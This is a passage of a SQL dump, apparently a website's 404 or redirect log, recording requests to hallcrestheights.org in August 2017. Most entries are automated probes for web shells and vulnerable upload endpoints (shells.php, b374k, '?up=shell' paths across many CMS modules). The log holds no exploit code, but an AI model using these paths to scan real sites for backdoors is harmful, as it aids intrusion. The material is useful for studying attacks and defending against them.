00:00:00'),(11676,'http://hallcrestheights.org//includes.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 01:58:26','0000-00-00 00:00:00'),(11677,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-08-09 01:59:36','0000-00-00 00:00:00'),(11678,'http://hallcrestheights.org//SessionController.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 01:58:19','0000-00-00 00:00:00'),(11679,'http://hallcrestheights.org//webconfig.txt.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 01:59:41','0000-00-00 00:00:00'),(11680,'http://hallcrestheights.org//configurationbak.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-09 02:00:43','0000-00-00 00:00:00'),(11681,'http://hallcrestheights.org//robots.txt.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:00:44','0000-00-00 00:00:00'),(11682,'http://hallcrestheights.org//images/404.php?z3=MDU0T2s2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:00:48','0000-00-00 00:00:00'),(11683,'http://hallcrestheights.org//sql_dump.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:00:50','0000-00-00 00:00:00'),(11684,'http://hallcrestheights.org//jconfig.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:00:52','0000-00-00 00:00:00'),(11685,'http://hallcrestheights.org//thumb.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 01:59:35','0000-00-00 00:00:00'),(11686,'http://hallcrestheights.org//xmlrpc-activate.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-09 02:01:19','0000-00-00 00:00:00'),(11687,'http://hallcrestheights.org//al277.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-09 02:00:00','0000-00-00 00:00:00'),(11688,'http://hallcrestheights.org//images/al277.php?z3=MDU0T2s2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:01:41','0000-00-00 00:00:00'),(11689,'http://hallcrestheights.org//wsdl.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:01:43','0000-00-00 00:00:00'),(11690,'http://hallcrestheights.org//wp-data.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:01:45','0000-00-00 00:00:00'),(11691,'http://hallcrestheights.org//media/1ndex.php?z3=MDU0T2s2LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-08-09 02:02:30','0000-00-00 00:00:00'),(11692,'http://hallcrestheights.org//media/tmp.php?z3=MDU0T2s2LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:01:12','0000-00-00 00:00:00'),(11693,'http://hallcrestheights.org//libraries/joomla/jmails.php?z3=MDU0T2s2LnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:02:34','0000-00-00 00:00:00'),(11694,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:02:35','0000-00-00 00:00:00'),(11695,'http://hallcrestheights.org//google-assist.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:02:37','0000-00-00 00:00:00'),(11696,'http://hallcrestheights.org//images/google-assist.php?z3=MDU0T2s2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-08-09 02:03:31','0000-00-00 00:00:00'),(11697,'http://hallcrestheights.org//elements.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:03:32','0000-00-00 00:00:00'),(11698,'http://hallcrestheights.org//cache/defau1t.php?z3=MDU0T2s2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:02:18','0000-00-00 00:00:00'),(11699,'http://hallcrestheights.org//roubt.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:02:20','0000-00-00 00:00:00'),(11700,'http://hallcrestheights.org//bookmark.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:03:42','0000-00-00 00:00:00'),(11701,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:05:05','0000-00-00 00:00:00'),(11702,'http://hallcrestheights.org//wp-content/plugins/easyrotator-for-wordpress/a.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',1,0,'2017-08-09 02:06:10','0000-00-00 00:00:00'),(11703,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:04:52','0000-00-00 00:00:00'),(11704,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:06:14','0000-00-00 00:00:00'),(11705,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:06:16','0000-00-00 00:00:00'),(11706,'http://hallcrestheights.org//modules/modules/modules.php?z3=MDU0T2s2LnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:05:41','0000-00-00 00:00:00'),(11707,'http://hallcrestheights.org//wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:05:42','0000-00-00 00:00:00'),(11708,'http://hallcrestheights.org//wp-content/themes/margreetalgra/404.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:07:04','0000-00-00 00:00:00'),(11709,'http://hallcrestheights.org//wp-content/themes/twentyeleven-child/footer.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:07:06','0000-00-00 00:00:00'),(11710,'http://hallcrestheights.org//sqlbak.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-09 02:07:10','0000-00-00 00:00:00'),(11711,'http://hallcrestheights.org//install.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-09 02:09:08','0000-00-00 00:00:00'),(11712,'http://hallcrestheights.org//xmlsrpc.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:11:02','0000-00-00 00:00:00'),(11713,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:11:05','0000-00-00 00:00:00'),(11714,'http://hallcrestheights.org//shootmei.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:11:07','0000-00-00 00:00:00'),(11715,'http://hallcrestheights.org//Abbrevsprl.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:13:14','0000-00-00 00:00:00'),(11716,'http://hallcrestheights.org//images/xxx.php?z3=MDU0T2s2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:15:30','0000-00-00 00:00:00'),(11717,'http://hallcrestheights.org//wp-content/1ndex.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:14:18','0000-00-00 00:00:00'),(11718,'http://hallcrestheights.org//cache/support.php?z3=MDU0T2s2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:14:21','0000-00-00 00:00:00'),(11719,'http://hallcrestheights.org//show.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:17:33','0000-00-00 00:00:00'),(11720,'http://hallcrestheights.org//cache/news.php?z3=MDU0T2s2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:18:38','0000-00-00 00:00:00'),(11721,'http://hallcrestheights.org//images/head.php?z3=MDU0T2s2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:18:40','0000-00-00 00:00:00'),(11722,'http://hallcrestheights.org//wp-content/plugins/wp-lg3.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:17:23','0000-00-00 00:00:00'),(11723,'http://hallcrestheights.org//wp-content/plugins/wp-lg2.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:18:45','0000-00-00 00:00:00'),(11724,'http://hallcrestheights.org//media/reads.php?z3=MDU0T2s2LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-08-09 02:19:39','0000-00-00 00:00:00'),(11725,'http://hallcrestheights.org//files/files.php?z3=MDU0T2s2LnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:20:12','0000-00-00 00:00:00'),(11726,'http://hallcrestheights.org//wp-content/plugins/caches.php?z3=MDU0T2s2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:20:14','0000-00-00 00:00:00'),(11727,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/054Ok6.php',NULL,'','',1,0,'2017-08-09 02:20:59','0000-00-00 00:00:00'),(11728,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/054Ok6.php',NULL,'','',1,0,'2017-08-09 02:21:01','0000-00-00 00:00:00'),(11729,'http://hallcrestheights.org//wp-content/uploads/054Ok6.php',NULL,'','',1,0,'2017-08-09 02:21:04','0000-00-00 00:00:00'),(11730,'http://hallcrestheights.org//054Ok6.php',NULL,'','',1,0,'2017-08-09 02:19:47','0000-00-00 00:00:00'),(11731,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/054Ok6.php',NULL,'','',1,0,'2017-08-09 02:19:48','0000-00-00 00:00:00'),(11732,'http://hallcrestheights.org//log.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:23:47','0000-00-00 00:00:00'),(11733,'http://hallcrestheights.org//includes/u2p.php?z3=MDU0T2s2LnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:25:09','0000-00-00 00:00:00'),(11734,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=MDU0T2s2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:25:11','0000-00-00 00:00:00'),(11735,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=MDU0T2s2LnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:25:13','0000-00-00 00:00:00'),(11736,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=MDU0T2s2LnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:25:15','0000-00-00 00:00:00'),(11737,'http://hallcrestheights.org//update.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:25:17','0000-00-00 00:00:00'),(11738,'http://hallcrestheights.org//wp-main.php?z3=MDU0T2s2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:24:31','0000-00-00 00:00:00'),(11739,'http://hallcrestheights.org//images/robots.txt.php?z3=MDU0T2s2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:24:34','0000-00-00 00:00:00'),(11740,'http://hallcrestheights.org//cli/40dd1d.php?z3=MDU0T2s2LnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-08-09 02:25:55','0000-00-00 00:00:00'),(11741,'http://www.hallcrestheights.org/upttmnbe-k36820-atgrb-nqcdcncx-rdhcpgz-i20162632-zdll-imvyx-jltfeo-bkeb-wivsmqkr.htm',NULL,'','',1,0,'2017-08-09 14:14:32','0000-00-00 00:00:00'),(11742,'http://www.hallcrestheights.org/wbwpbon-k60173-kydhx-jjikvf-i20162631-vtzpxb/',NULL,'','',1,0,'2017-08-09 20:46:20','0000-00-00 00:00:00'),(11743,'http://hallcrestheights.org/w0rm.php',NULL,'','',1,0,'2017-08-10 01:48:30','0000-00-00 00:00:00'),(11744,'http://hallcrestheights.org/shells.php',NULL,'','',1,0,'2017-08-10 01:48:30','0000-00-00 00:00:00'),(11745,'http://www.hallcrestheights.org/i20162632-ixnmueah-k15520-whioz-hjxbnwpg-eyooayi-kuks-szqce-baqdom.htm',NULL,'','',1,0,'2017-08-10 20:15:52','0000-00-00 00:00:00'),(11746,'http://www.hallcrestheights.org/i20162632-ixnmuea-k41728-hwhiozhj-xbnwpgey-ooayiku-ksszqc-ebaqd-omytniho.htm',NULL,'','',2,0,'2017-08-12 06:51:19','0000-00-00 00:00:00'),(11747,'http://hallcrestheights.org/files/hh newsletter 201704.pdf',NULL,'','',1,0,'2017-08-12 22:28:49','0000-00-00 00:00:00'),(11748,'http://www.hallcrestheights.org/events/7-press.html',NULL,'','',3,0,'2017-08-12 22:56:53','0000-00-00 00:00:00'),(11749,'http://hallcrestheights.org/wp-content/plugins/ubh/up.php',NULL,'','',1,0,'2017-08-15 04:09:02','0000-00-00 00:00:00'),(11750,'http://hallcrestheights.org/temp.php',NULL,'hallcrestheights.org','',4,0,'2017-08-15 04:13:29','0000-00-00 00:00:00'),(11751,'http://www.hallcrestheights.org/k5300-dvisciwb-vwkux-krbzomsm-i20162635-vuclzup.htm',NULL,'','',2,0,'2017-08-15 16:00:56','0000-00-00 00:00:00'),(11752,'http://hallcrestheights.org/content-footer.php',NULL,'hallcrestheights.org','',1,0,'2017-08-17 03:27:19','0000-00-00 00:00:00'),(11753,'http://hallcrestheights.org/wologin.php?check=true',NULL,'hallcrestheights.org','',1,0,'2017-08-18 07:53:45','0000-00-00 00:00:00'),(11754,'http://hallcrestheights.org/sell.php?check=true',NULL,'hallcrestheights.org','',1,0,'2017-08-18 07:54:17','0000-00-00 00:00:00'),(11755,'http://hallcrestheights.org/wpversion.php?check=true',NULL,'hallcrestheights.org','',1,0,'2017-08-18 07:56:24','0000-00-00 00:00:00'),(11756,'http://hallcrestheights.org/libraries/joomla/base/content-footer.php',NULL,'hallcrestheights.org','',1,0,'2017-08-18 15:21:10','0000-00-00 00:00:00'),(11757,'http://www.hallcrestheights.org/nfrkop-i20162629-k15749-dobbumgo-lzes-rkwtz/',NULL,'','',2,0,'2017-08-19 09:27:55','0000-00-00 00:00:00'),(11758,'http://hallcrestheights.org/email/logo_img.php',NULL,'http://hallcrestheights.org/email/logo_img.php','',1,0,'2017-08-19 09:31:39','0000-00-00 00:00:00'),(11759,'http://hallcrestheights.org/log/logo_img.php',NULL,'http://hallcrestheights.org/log/logo_img.php','',5,0,'2017-08-19 09:34:34','0000-00-00 00:00:00'),(11760,'http://hallcrestheights.org/components/system_img.php',NULL,'http://hallcrestheights.org/components/system_img.php','',1,0,'2017-08-19 09:36:38','0000-00-00 00:00:00'),(11761,'http://www.hallcrestheights.org/edzvd-k43084-lqco-mnnm-mcawvbfu-i20162632-japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh.htm',NULL,'','',2,0,'2017-08-19 10:28:36','0000-00-00 00:00:00'),(11762,'http://hallcrestheights.org/layouts_/logo_img.php',NULL,'http://hallcrestheights.org/layouts_/logo_img.php','',1,0,'2017-08-19 11:09:10','0000-00-00 00:00:00'),(11763,'http://hallcrestheights.org/_/administrator/logo_img.php',NULL,'http://hallcrestheights.org/_/administrator/logo_img.php','',2,0,'2017-08-19 12:30:51','0000-00-00 00:00:00'),(11764,'http://hallcrestheights.org/tmp/system_infos.php',NULL,'http://hallcrestheights.org/tmp/system_infos.php','',6,0,'2017-08-19 12:32:02','0000-00-00 00:00:00'),(11765,'http://hallcrestheights.org/cli/headers_img.php',NULL,'http://hallcrestheights.org/cli/headers_img.php','',1,0,'2017-08-19 12:47:58','0000-00-00 00:00:00'),(11766,'http://hallcrestheights.org/info_img.php',NULL,'http://hallcrestheights.org/info_img.php','',1,0,'2017-08-19 13:45:08','0000-00-00 00:00:00'),(11767,'http://hallcrestheights.org/templates/system_infos.php',NULL,'http://hallcrestheights.org/templates/system_infos.php','',8,0,'2017-08-19 13:52:45','0000-00-00 00:00:00'),(11768,'http://hallcrestheights.org/bin/header_img.php',NULL,'http://hallcrestheights.org/bin/header_img.php','',2,0,'2017-08-19 13:56:20','0000-00-00 00:00:00'),(11769,'http://www.hallcrestheights.org/k7964-pcscq-i20162633-rufu-npkw-xpoideot.htm',NULL,'','',2,0,'2017-08-19 14:54:05','0000-00-00 00:00:00'),(11770,'http://hallcrestheights.org/logs/system_infos.php',NULL,'http://hallcrestheights.org/logs/system_infos.php','',3,0,'2017-08-19 15:18:00','0000-00-00 00:00:00'),(11771,'http://hallcrestheights.org/actions/logo_img.php',NULL,'http://hallcrestheights.org/actions/logo_img.php','',7,0,'2017-08-19 16:00:19','0000-00-00 00:00:00'),(11772,'http://hallcrestheights.org/dump/logo_img.php',NULL,'http://hallcrestheights.org/dump/logo_img.php','',1,0,'2017-08-19 18:36:17','0000-00-00 00:00:00'),(11773,'http://hallcrestheights.org/language/headers_img.php',NULL,'http://hallcrestheights.org/language/headers_img.php','',1,0,'2017-08-19 19:43:45','0000-00-00 00:00:00'),(11774,'http://hallcrestheights.org/language/system_infos.php',NULL,'http://hallcrestheights.org/language/system_infos.php','',8,0,'2017-08-19 19:52:41','0000-00-00 00:00:00'),(11775,'http://hallcrestheights.org/system/logo_img.php',NULL,'http://hallcrestheights.org/system/logo_img.php','',2,0,'2017-08-19 19:56:10','0000-00-00 00:00:00'),(11776,'http://hallcrestheights.org/cmscore/logo_img.php',NULL,'http://hallcrestheights.org/cmscore/logo_img.php','',4,0,'2017-08-19 22:30:04','0000-00-00 00:00:00'),(11777,'http://hallcrestheights.org/xmlrpc/system_infos.php',NULL,'http://hallcrestheights.org/xmlrpc/system_infos.php','',8,0,'2017-08-19 22:41:14','0000-00-00 00:00:00'),(11778,'http://hallcrestheights.org/sessions/logo_img.php',NULL,'http://hallcrestheights.org/sessions/logo_img.php','',4,0,'2017-08-20 00:15:42','0000-00-00 00:00:00'),(11779,'http://hallcrestheights.org/images/headers_img.php',NULL,'http://hallcrestheights.org/images/headers_img.php','',1,0,'2017-08-20 04:32:07','0000-00-00 00:00:00'),(11780,'http://hallcrestheights.org/_installation/logo_img.php',NULL,'http://hallcrestheights.org/_installation/logo_img.php','',2,0,'2017-08-20 04:34:18','0000-00-00 00:00:00'),(11781,'http://hallcrestheights.org/components/com_portfolio/includes/phpthumb/cache/1/1c/logo_img.php',NULL,'http://hallcrestheights.org/components/com_portfolio/includes/phpthumb/cache/1/1c/logo_img.php','',76,0,'2017-08-20 07:34:10','0000-00-00 00:00:00'),(11782,'http://hallcrestheights.org/installation/logo_img.php',NULL,'http://hallcrestheights.org/installation/logo_img.php','',1,0,'2017-08-20 07:39:10','0000-00-00 00:00:00'),(11783,'http://hallcrestheights.org/layouts/system_infos.php',NULL,'http://hallcrestheights.org/layouts/system_infos.php','',6,0,'2017-08-20 07:43:41','0000-00-00 00:00:00'),(11784,'http://hallcrestheights.org/images/system_img.php',NULL,'http://hallcrestheights.org/images/system_img.php','',4,0,'2017-08-20 08:51:08','0000-00-00 00:00:00'),(11785,'http://hallcrestheights.org/modules/mod_swmenufree/logo_img.php',NULL,'http://hallcrestheights.org/modules/mod_swmenufree/logo_img.php','',1,0,'2017-08-20 09:35:54','0000-00-00 00:00:00'),(11786,'http://hallcrestheights.org/_private/logo_img.php',NULL,'http://hallcrestheights.org/_private/logo_img.php','',4,0,'2017-08-20 10:45:57','0000-00-00 00:00:00'),(11787,'http://hallcrestheights.org/tmp/headers_img.php',NULL,'http://hallcrestheights.org/tmp/headers_img.php','',2,0,'2017-08-20 12:04:03','0000-00-00 00:00:00'),(11788,'http://www.hallcrestheights.org/k14980-upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-i20162631-jltfeo.htm',NULL,'','',1,0,'2017-08-21 06:02:46','0000-00-00 00:00:00'),(11789,'http://www.hallcrestheights.org/events/2-uncategorised.feed',NULL,'','',3,0,'2017-08-21 07:53:16','0000-00-00 00:00:00'),(11790,'http://www.hallcrestheights.org/events/2-uncategorised/1-home.html',NULL,'','',1,0,'2017-08-21 07:53:22','0000-00-00 00:00:00'),(11791,'http://www.hallcrestheights.org/yembjvh-k28233-tqqdc-kzfltz-terqbw-nswns-i20162637-njpl-pftrrj-ncypjo/',NULL,'','',1,0,'2017-08-21 15:58:55','0000-00-00 00:00:00'),(11792,'http://hallcrestheights.org/kickstart.php',NULL,'http://hallcrestheights.org/','',8,0,'2017-08-22 07:30:37','0000-00-00 00:00:00'),(11793,'http://hallcrestheights.org/images/inages.php',NULL,'hallcrestheights.org','',1,0,'2017-08-22 13:02:56','0000-00-00 00:00:00'),(11794,'http://hallcrestheights.org/images/copy_conflg.php?passw0rd=123',NULL,'hallcrestheights.org','',1,0,'2017-08-22 13:23:36','0000-00-00 00:00:00'),(11795,'http://hallcrestheights.org/libraries/joomla/base/options-permalinks.php',NULL,'hallcrestheights.org','',1,0,'2017-08-22 13:34:12','0000-00-00 00:00:00'),(11796,'http://hallcrestheights.org/components/com_content/models/green.php',NULL,'hallcrestheights.org','',1,0,'2017-08-22 15:06:36','0000-00-00 00:00:00'),(11797,'http://hallcrestheights.org/assets/b374k-2.8.php',NULL,'hallcrestheights.org','',1,0,'2017-08-22 15:06:39','0000-00-00 00:00:00'),(11798,'http://www.hallcrestheights.org/events/2-uncategorised.html',NULL,'','',1,0,'2017-08-23 08:34:32','0000-00-00 00:00:00'),(11799,'http://hallcrestheights.org/plugins/content/apismtp/apismtp.php',NULL,'','',4,0,'2017-08-23 16:22:39','0000-00-00 00:00:00'),(11800,'http://hallcrestheights.org/libraries/joomla/base/extruder.php',NULL,'hallcrestheights.org','',1,0,'2017-08-23 17:44:21','0000-00-00 00:00:00'),(11801,'http://hallcrestheights.org/modules/columnadverts//slides/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:03:31','0000-00-00 00:00:00'),(11802,'http://hallcrestheights.org/modules/soopamobile//slides/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:03:33','0000-00-00 00:00:00'),(11803,'http://hallcrestheights.org/modules/soopabanners//slides/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:03:36','0000-00-00 00:00:00'),(11804,'http://hallcrestheights.org/modules/vtermslideshow//slides/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:03:37','0000-00-00 00:00:00'),(11805,'http://hallcrestheights.org/modules/simpleslideshow//slides/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:03:38','0000-00-00 00:00:00'),(11806,'http://hallcrestheights.org/modules/productpageadverts//slides/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:03:40','0000-00-00 00:00:00'),(11807,'http://hallcrestheights.org/modules/homepageadvertise//slides/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:03:41','0000-00-00 00:00:00'),(11808,'http://hallcrestheights.org/modules/homepageadvertise2//slides/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:02:24','0000-00-00 00:00:00'),(11809,'http://hallcrestheights.org/modules/jro_homepageadvertise//slides/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:02:26','0000-00-00 00:00:00'),(11810,'http://hallcrestheights.org/modules/attributewizardpro//file_uploads/$aa?up=shell',NULL,'','',1,0,'2017-08-24 00:03:48','0000-00-00 00:00:00'),(11811,'http://hallcrestheights.org/modules/1attributewizardpro/file_uploads/$aa?up=shell',NULL,'','',1,0,'2017-08-24 00:03:49','0000-00-00 00:00:00'),(11812,'http://hallcrestheights.org/modules/attributewizardpro.OLD//file_uploads/$aa?up=shell',NULL,'','',1,0,'2017-08-24 00:02:30','0000-00-00 00:00:00'),(11813,'http://hallcrestheights.org/modules/attributewizardpro_x//file_uploads/$aa?up=shell',NULL,'','',1,0,'2017-08-24 00:03:51','0000-00-00 00:00:00'),(11814,'http://hallcrestheights.org/modules//wg24themeadministration///img/upload/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:03:52','0000-00-00 00:00:00'),(11815,'http://hallcrestheights.org/modules///fieldvmegamenu/uploads/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:03:53','0000-00-00 00:00:00'),(11816,'http://hallcrestheights.org/modules/wdoptionpanel/upload//hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:03:54','0000-00-00 00:00:00'),(11817,'http://hallcrestheights.org/modules///pk_flexmenu//uploads/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:03:55','0000-00-00 00:00:00'),(11818,'http://hallcrestheights.org/modules///pk_vertflexmenu//uploads/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:02:36','0000-00-00 00:00:00'),(11819,'http://hallcrestheights.org/modules/nvn_export_orders/nvn_extra_add.php?up=shell',NULL,'','',1,0,'2017-08-24 00:03:56','0000-00-00 00:00:00'),(11820,'http://hallcrestheights.org/modules/orderfiles/files/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:02:38','0000-00-00 00:00:00'),(11821,'http://hallcrestheights.org/modules//tdpsthemeoptionpanel/upload/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:03:58','0000-00-00 00:00:00'),(11822,'http://hallcrestheights.org/modules//psmodthemeoptionpanel/upload/hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:04:00','0000-00-00 00:00:00'),(11823,'http://hallcrestheights.org/masseditproduct/uploads/file//hous.php?up=shell',NULL,'','',1,0,'2017-08-24 00:04:01','0000-00-00 00:00:00'),(11824,'http://hallcrestheights.org/wp-post.php',NULL,'hallcrestheights.org','',6,0,'2017-08-24 08:37:24','0000-00-00 00:00:00'),(11825,'http://hallcrestheights.org/plugins/content/apismtp.php',NULL,'','',3,0,'2017-08-24 10:08:30','0000-00-00 00:00:00'),(11826,'http://hallcrestheights.org/modules/mod_jmodule/mod_jmodule.php',NULL,'hallcrestheights.org','',7,0,'2017-08-24 14:16:36','0000-00-00 00:00:00'),(11827,'http://hallcrestheights.org/new/administrator/index.php',NULL,'','',1,0,'2017-08-24 22:29:50','0000-00-00 00:00:00'),(11828,'http://hallcrestheights.org/site/administrator/index.php',NULL,'','',1,0,'2017-08-25 14:42:53','0000-00-00 00:00:00'),(11829,'http://www.hallcrestheights.org/events/2-uncategorised/2-work-in-progress.html',NULL,'','',1,0,'2017-08-25 23:04:46','0000-00-00 00:00:00'),(11830,'http://hallcrestheights.org/joomla-extends.php',NULL,'','',2,0,'2017-08-26 21:23:19','0000-00-00 00:00:00'),(11831,'http://hallcrestheights.org/libraries/phpmailer/language/popup-pomo.php',NULL,'http://hallcrestheights.org/libraries/phpmailer/language/popup-pomo.php','',3,0,'2017-08-27 16:33:32','0000-00-00 00:00:00'),(11832,'http://hallcrestheights.org/homefeatured/popup-pomo.php',NULL,'http://hallcrestheights.org/homefeatured/popup-pomo.php','',2,0,'2017-08-27 16:43:21','0000-00-00 